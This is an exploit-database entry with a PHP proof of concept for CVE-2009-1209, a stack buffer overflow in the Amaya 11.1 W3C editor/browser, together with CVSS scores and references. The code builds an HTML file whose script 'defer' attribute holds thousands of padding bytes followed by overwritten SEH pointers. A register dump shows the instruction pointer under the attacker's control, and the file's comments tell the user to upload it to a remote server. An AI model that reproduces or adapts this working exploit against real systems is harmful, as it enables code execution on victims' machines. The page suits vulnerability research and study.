Amaya 11.1 W3C Editor/Browser (defer) Stack Overflow PoC

2009.04.02
Credit: Alfons Luja
Risk: High
Local: Yes
Remote: No
CVE: CVE-2009-1209
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /**//* Amaya 11.1 W3C's editor/browser Stack Owerflow POC Discover by Alfons Luja Thx : OiN select * from friends -- This stUff overwrite SEH in my box XP home sp 2 To correctly overwrite seh you must upload "remote_love.html" to remote server Amaya allow only printable shellcode in this case EAX:00000000 ECX:43434343 EDX:7C9037D8 EBX:00000000 ESP:0012DDD0 EBP:0012DDF0 ESI:00000000 EDI:00000000 EIP:43434343 *//**/ $junk = "\x41"; $n_seh = "\x42\x42\x42\x42"; //pointer to next seh $h_seh = "\x43\x43\x43\x43"; //seh handler for($i=1;$i<7000 - (4*19) - 10;$i++){ $junk.="\x41"; } $junk.=$n_seh; $junk.=$h_seh; $hello = "<script defer=\"".$junk."\">"; $hnd = fopen("remote_love.html","w"); if($hnd){ fputs($hnd,$hello); fclose($hnd); echo"DONE !!\n"; } else { echo"Kupa !!\n"; } ?>

References:

http://www.securityfocus.com/bid/34295
http://www.milw0rm.com/exploits/8321
http://www.milw0rm.com/exploits/8314
http://secunia.com/advisories/34531


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top